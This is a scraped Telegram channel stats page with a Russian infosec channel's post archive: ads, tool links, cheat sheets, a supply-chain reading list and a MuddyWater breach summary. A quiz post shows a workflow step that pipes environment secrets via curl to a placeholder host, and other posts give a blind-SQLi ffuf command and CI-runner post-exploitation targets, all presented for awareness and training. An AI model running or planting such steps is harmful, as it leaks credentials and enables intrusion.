Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность

Open in Telegram

Все самое полезное по инфобезу в одном канале. Список наших каналов: https://t.me/proglibrary/9197 Для обратной связи: @proglibrary_feeedback_bot По рекламе: @proglib_adv РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf

Network:Книги для программистов Russia51 773 Technologies & Applications9 916...

📈 Analytical overview of Telegram channel Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность

Channel Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность (@hackproglib) in the Russian language segment is an active participant. Currently, the community unites 12 824 subscribers, ranking 9 916 in the Technologies & Applications category and 51 773 in the Russia region.

📊 Audience metrics and dynamics

Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 12 824 subscribers.

According to the latest data from 03 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 7 over the last 30 days and by 3 over the last 24 hours, overall reach remains high.

Verification status: Not verified
Engagement rate (ER): The average audience engagement rate is 6.19%. Within the first 24 hours after publication, content typically collects 3.73% reactions from the total number of subscribers.
Post reach: On average, each post receives 794 views. Within the first day, a publication typically gains 479 views.
Reactions and interaction: The audience actively supports content: the average number of reactions per post is 7.
Thematic interests: Content is focused on key topics such as хакер, навигация, htb, linux, шпаргалка.

📝 Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
“Все самое полезное по инфобезу в одном канале. Список наших каналов: https://t.me/proglibrary/9197 Для обратной связи: @proglibrary_feeedback_bot По рекламе: @proglib_adv РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf”

Thanks to the high frequency of updates (latest data received on 04 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

12 824

Subscribers

+324 hours

-57 days

+730 days

794

Post views

~ 47924 hours

~ 55548 hours

6.19%

Engagement rate

~ 4

Posts per day

Ads index

beta

Posts Archive

12 824

Repost from Азбука айтишника

🐧 Шпаргалка по работе с утилитой cron и правам для файлов в Linux: на заметку этичному хакеру 🔹 Курс «Алгоритмы и структуры данных» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #магиякода

12 824

💡 Крупнейший каталог OSINT-инструментов В каталоге собрано более 1300 инструментов, разбитых на десятки категорий:

— Telegram — Социальные сети — Email и Username Search — Геолокация — Анализ доменов и IP — Утечки данных — Metadata Analysis — Threat Intelligence

➡️ Что удобно: — поиск по инструментам; — автоматическое обновление из GitHub; — более 50 категорий; — веб-версия, Android и desktop-клиент. Полезная закладка для OSINT-специалистов, расследователей, багхантеров и пентестеров. 🔗 Ссылка 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #resource_drop

12 824

🧩 Хакер-челлендж Сценарий: в open source-репозиторий прилетает pull request с “безобидным” изменением GitHub Actions workflow. Внутри добавили шаг:

- name: Debug publish   run: |     env | base64 | curl -s -X POST https://example[.]com/logs -d @-

Автор PR пишет:

«Оптимизировал publish pipeline и добавил debug output для диагностики релизов».

❓ Что здесь нужно проверять в первую очередь? Голосуйте эмодзи: 🔥 — Exfiltration of CI/CD secrets: workflow пытается вывести переменные окружения и секреты наружу. 👾 — Dependency confusion: пакет подтягивается из внешнего registry. ❤️ — Cache poisoning: атакующий подменяет build cache. 👍 — Path traversal: workflow читает файлы за пределами проекта. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #ctf_challenge

12 824

⚡️ Продолжаем знакомить вас с экспертами курса AgentOps! — Сергей Нотевский расскажет, как выстроить FinOps для AI-продуктов: оптимизировать затраты на разработку и продакшен, внедрить model routing, semantic cache и систему алертов для контроля расходов — Эмиль Сатаев разберет Context Engineering: управление контекстом, защиту от prompt injection, работу с длинными контекстами и построение безопасного пайплайна входа для AI-систем — Михаил Бондаревский покажет, как подготовить инфраструктуру для AI-агентов: Docker, sandboxing, streaming, docker-compose и воспроизводимое окружение для разработки и продакшена — Мурат Хажгериев расскажет про Enterprise Integrations & MCP: когда MCP действительно нужен, как подключать внешние сервисы и реализовывать интеграции с OAuth2 delegation — Герман Сабиров разберет Governance & Compliance для AI-систем: data flow, audit logs, требования 152-ФЗ, локализацию данных и построение compliance-подхода на уровне архитектуры Курс для backend-разработчиков, тимлидов и LLM инженеров о том, как внедрять AI-логику в бэкенд IT-продуктов и сохранять стабильность сервиса. 👉 Изучить обновленную программу AgentOps и занять место.

12 824

💻 Практика атак на Kubernetes Kubernetes Goat — это специально уязвимый Kubernetes-кластер для обучения безопасности на практике. ➡️ Что внутри: — ошибки RBAC и лишние привилегии — уязвимые контейнеры — небезопасные настройки кластера — privilege escalation — container escape — практические сценарии для Red Team и Blue Team Отличная площадка для изучения атак на Kubernetes в безопасной среде ✅ 🔗 Ссылка на GitHub 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #tool_of_the_week

12 824

Подрядчик подключился к вашей системе. Работу сделал. Доступ остался. Знакомая ситуация? В какой-то момент становится сложно ответить на простой вопрос, кто сейчас вообще подключен к вашим ИТ-ресурсам и что там делает. Именно в таких сценариях чаще всего начинаются проблемы. Доступы выдаются быстро, а потом про них забывают. Контроль снижается, а одной ошибки или компрометации бывает достаточно, чтобы затронуть важные для компании системы. В канале Индид вы найдете материалы о том, как выстраивать защиту учетных данных, снижать риски инцидентов и всегда держать доступ к инфраструктуре под контролем. В нем вы сможете забрать гайд по работе с подрядчиками. Внутри: 📍 Ключевые риски ИБ при работе с подрядчиками 📍 Способы атак злоумышленников и их последствия 📍 Меры безопасности, регламентирующие получение прав доступа Подписывайтесь на канал Индид, чтобы регулярно читать практические материалы о защите доступа. #реклама О рекламодателе

12 824

Repost from Азбука айтишника

Они прогрессируют, уже пытаются маскироваться под людей 🔹 Курс разработка AI-агентов 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #небагафича

12 824

⚡️ Blind SQLi через время ответа в ffuf При поиске Blind SQL Injection не всегда есть ошибки в ответе приложения. Иногда единственный признак — увеличение времени ответа. Команда для поиска параметров с задержкой:


  -w /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt \
  -fc 404 \
  -mt 5000

🈂️ -mt 5000 — покажет только ответы дольше 5 секунд 🈂️ Задержка может указывать на time-based Blind SQLi 🈂️ Удобно для первичного скрининга параметров без ручной проверки ⚠️ Не забывайте исключать ложные срабатывания из-за медленных API, rate limiting и сетевых задержек. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #cheat_sheet

12 824

Repost from Азбука айтишника

🛣 Penetration Testing Roadmap — коллекция ресурсов, сертификатов, инструментов и методологий, которые помогут вам стать экспертом в области пентеста. 👉 GitHub & Сайт 🔹 Курс «Алгоритмы и структуры данных» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #магиякода

12 824

🔥 Автоматизация пентеста через AI-агентов Pentest Swarm AI агенты обмениваются находками между собой и самостоятельно выбирают следующие шаги атаки на основе уже собранных данных. Что умеет: 🔘 Поиск поддоменов 🔘 Сканирование портов 🔘 Поиск уязвимостей 🔘 Эксплуатация находок 🔘 Генерация отчётов Есть готовые сценарии для Bug Bounty, CTF и анализа внешней поверхности атаки. 🔗 GitHub 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #tool_of_the_week

12 824

⚡️ Последний шанс забрать курсы со СКИДКОЙ 40%! Прокачайте свой мозг правильно До конца акции вы можете воспользоваться специальными ценами на самые востребованные IT-направления. Круто и выгодно прокачать свои скиллы, чтобы получить оффер, уехать на Бали и больше не быть онлайн 😎 ➡️ Разработка AI-агентов — от 49 000 ₽ (вместо 69 000 ₽) Курс про контролируемую разработку ИИ-агентов: качество, стоимость, наблюдаемость и тестирование. С первого занятия — только практическая работа. ➡️ Курс AgentOps — 129 000 ₽ (вместо 149 000 ₽) Профессиональный трек для разработчиков и LLM инженеров о том, как правильно внедрять AI-логику в бэкенд и сохранять железную стабильность сервиса. ➡️ Математика для Data Science — от 29 990 ₽ (вместо 39 990 ₽) Вы научитесь решать сложные математические задачи, которые дают на собеседованиях на позицию дата-сайентиста в бигтехе. Отличная база для мощного старта в DS. ➡️ Курс Специалист по ИИ — 89 000 ₽ (вместо 113 900 ₽) Комплексная программа для получения профессии в сфере ИИ с нуля. За 8 месяцев вы соберете сильное портфолио из 5 реальных проектов и дипломной работы. ➡️ Архитектуры и шаблоны проектирования — 27 990 ₽ (вместо 37 900 ₽) Интенсив для разработчиков, который поможет освоить основные паттерны проектирования и прокачать навыки архитектора программного обеспечения. 🌸 Выбирайте направление, оставляйте заявку на сайте распродажи, и наш менеджер подробно вас проконсультирует

12 824

Repost from Азбука айтишника

🔑 Топ-4 механизма аутентификации Эти архитектуры уберегут вас от фатальных дыр в безопасности при настройке серверов, интеграции сторонних сервисов или проектировании баз данных. 🛡 Главные инструменты проверки:

1. Ключи SSH: Криптографическая пара из публичного и приватного ключей. Публичный лежит на сервере, приватный — у вас. Идеально подходит для безопасного беспарольного доступа к серверам и Git-репозиториям. 2. Токены OAuth: Временные цифровые пропуска, которые выдает сервер авторизации. Нужны для того, чтобы сторонние приложения могли получить ограниченный доступ к вашим данным (например, «войти через Google»), вообще не зная вашего реального пароля. 3. Сертификаты SSL: Цифровые паспорта для сайтов. Они подтверждают, что сервер принадлежит именно тому домену, на который вы зашли, и обеспечивают безопасное зашифрованное HTTPS-соединение. 4. Учетные данные: Классическая связка «логин + пароль». Данные пользователя отправляются по защищенному каналу на сервер, где пароль хэшируется и сверяется с базой данных. Самый старый, понятный, но и самый уязвимый из-за человеческого фактора метод.

🔹 Практический интенсив «Архитектуры и шаблоны проектирования» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #ликбез

12 824

📌 580+ команд для пентестера Внутри собраны команды по основным направлениям:

— Recon & Enumeration
— Active Directory
— Web Security
— Privilege Escalation
— Pivoting & Tunneling
— Post Exploitation
— Linux и Windows

Все команды разбиты по категориям и доступны через удобный интерфейс в стиле терминала ⚡️ 🔵 Подойдёт для: — OSCP / OSEP подготовки; — CTF; — лабораторий; — внутренних пентестов; — быстрого поиска команд во время работы. 📎 Ссылка 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #cheat_sheet

12 824

🦾🧠🏋️ Качаем мозги к лету! Все готовятся к пляжному сезону, а мы предлагаем прокачать хард-скилы, чтобы забрать крутой оффер, строить продукты будущего и работать из любой точки мира 😎 ⚡️ Распродажа @proglib_academy: забирайте самые актуальные образовательные треки по сниженным ценам! ➡️ Разработка AI-агентов — от 49 000 ₽ (вместо 69 000 ₽). ➡️ Курс AgentOps — 129 000 ₽ (вместо 149 000 ₽). ➡️ Математика для разработки AI-моделей — 23 990 ₽ (вместо 31 990 ₽). ➡️ ML для старта в Data Science — 28 990 ₽ (вместо 38 990 ₽). Почему мы? ⭐️Учим для продакшена. Наши программы заточены под реальные задачи бизнеса: как не слить бюджет на токены, как заставить LLM работать стабильно в бэкенде и как выстроить отказоустойчивую архитектуру. ⭐️Спикеры — суровые практики. Вы будете перенимать опыт у действующих AI-архитекторов, тимлидов и ML-инженеров из топовых IT-компаний. ⭐️Комплексный подход. Мы даем как мощный математический фундамент для понимания моделей «под капотом», так и передовые инструменты оркестрации агентов. ⭐️Много практики и фидбека. Вебинары, десятки практических заданий и живое общение с экспертами в чате Telegram на протяжении всего обучения. ⏳ Оставляйте заявку и бронируйте место со СКИДКОЙ 40%

12 824

📌 Подборка статей по теме Supply Chain атак через инструменты разработчика Собрали топовые материалы: от разбора конкретных инцидентов до техник защиты. ➖ Отравленное расширение VS Code привело к взлому GitHub, и Microsoft владеет каждым звеном этой цепи — полная анатомия атаки: как троянизированный Nx Console (2.2M установок) за 18 минут привёл к краже 3 800 внутренних репозиториев GitHub. Лучший разбор инцидента. ➖ Технический deep dive в пейлоад Nx Console — StepSecurity — multi-stage credential stealer: сбор токенов из GitHub/npm/AWS/Vault/K8s/1Password, DNS-туннелирование, persistence через GitHub Search API как dead-drop, поддельная Sigstore-аттестация для публикации «легитимных» пакетов. ➖ Ликвидация инфраструктуры GlassWorm: разрушение supply chain атак на VS Code, npm, Python и GitHub — как CrowdStrike, Google и Shadowserver 26 мая одновременно уничтожили все C2-каналы ботнета. 35 000+ заражённых установок, 300+ отравленных репозиториев с начала 2025. ➖ Вредоносный npm-пакет крадёт файлы из рабочей директории Claude AI — пакет mouse5212-super-formatter, написанный с помощью ИИ, таргетит /mnt/user-data. Автор слил свой же GitHub-токен в код. ➖ Как закрепить версии расширений VS Code для защиты от supply chain атак — практический гайд: pinning версий в devcontainers, отключение автообновления, проверка publisher identity. ➖ Утечка исходного кода GitHub: причиной стало вредоносное расширение для VS Code — подробный русскоязычный разбор: механика червя Mini Shai-Hulud, инфраструктура C2 через «мёртвые» репозитории, демон kitty-monitor, аварийный переключатель по ключевому слову «firedalazer». ➖ Вы пустили ИИ-агента в репозиторий — теперь разбираемся, что он может сломать — кража SSH-ключей через Claude Code, эксфильтрация через DNS-запросы в обход allowlist, компрометация CI/CD → cloud admin за 72 часа через OIDC. ➖ Черви в расширениях VS Code: новая угроза для разработчиков — как вредоносные расширения используют децентрализованные C2, обфускацию и легитимные репозитории. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #resource_drop

12 824

🐸 Библиотека хакера #hack_humor

12 824

Repost from Азбука айтишника

Если вы думаете, что ваш провайдер медленный, вспомните парней из Норвегии. В 2001 году группа пользователей Linux из Бергена решила на практике проверить шуточный протокол IP over Avian Carriers (RFC 1149). Результаты легендарного эксперимента:

- Дистанция: 5 км. - Пакеты: 9 ICMP-запросов (пингов), привязанных к лапкам голубей. - Потери: До финиша добрались только 4 ответа. Пакет лосс составил солидные 55,6%. - Задержка: От 53 минут до 1 часа 40 минут.

А какой был ваш самый «медленный» опыт работы с сетью? ❤️ — 56 кбит/с 🔥 — Спутник в глуши 🙏 — Раздача с телефона в подвале (одна палочка EDGE и бесконечное ожидание) 🔹 Курс разработка AI-агентов 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #режимразраба

12 824

🔥 Вопрос с собеседования Как можно развить атаку после доступа к CI/CD runner? 👇Правильный ответ: Runner — это не просто машина для сборки. Часто он имеет доступ к секретам, registry, облакам и внутренней сети. Что проверять дальше: — переменные окружения и CI/CD secrets; — токены GitHub / GitLab / cloud-провайдеров; — доступ к Docker socket или Kubernetes config; — какие internal-сервисы видит runner; — можно ли подменить артефакты сборки; — есть ли доступ к container registry; — куда pipeline может деплоить код. ⚡️ Сильный ответ: «После доступа к runner я оцениваю blast radius: какие секреты доступны, куда можно двигаться дальше и можно ли повлиять на supply chain.» 📍 Навигация: [Вакансии] 👍 — хороший вопрос 🔥 — забрал в копилку 🐸 Библиотека хакера #ctf_challenge

12 824

⌨️ DLL Side-Loading — любимый приём APT Подписанный .exe выглядит безопасно, антивирус видит известный процесс, а вредоносный код quietly запускается через подложенную библиотеку. 🔜 После кейса MuddyWater собрали короткую шпаргалку по DLL Side-Loading:

— как работает техника; — почему её сложно замечать; — что искать в логах; — как детектить через Sysmon и PowerShell.

Сохраняйте в избранное ⚡️ 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #cheat_sheet

12 824

🇮🇷 MuddyWater превращает доверенные EXE в загрузчики малвари Symantec и Carbon Black раскрыли новую кампанию MuddyWater (Seedworm / Static Kitten), связанной с Министерством разведки Ирана. 🔜 Под удар попали 9 организаций на 4 континентах:

аэропорт, финансовый сектор, промышленность, образование и крупный производитель электроники

Главная техника — DLL Side-Loading через доверенные бинарники: 🔴 fmapp.exe → загружает вредоносную fmapp.dll 🔴 sentinelmemoryscanner.exe → грузит

sentinelagentcore.dll

😳 После закрепления внутри сети использовались: — Node.js runtime для PowerShell; — dump SAM и повышение привилегий; — SOCKS5 reverse proxy; — эксфильтрация через sendit.sh. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #breach_breakdown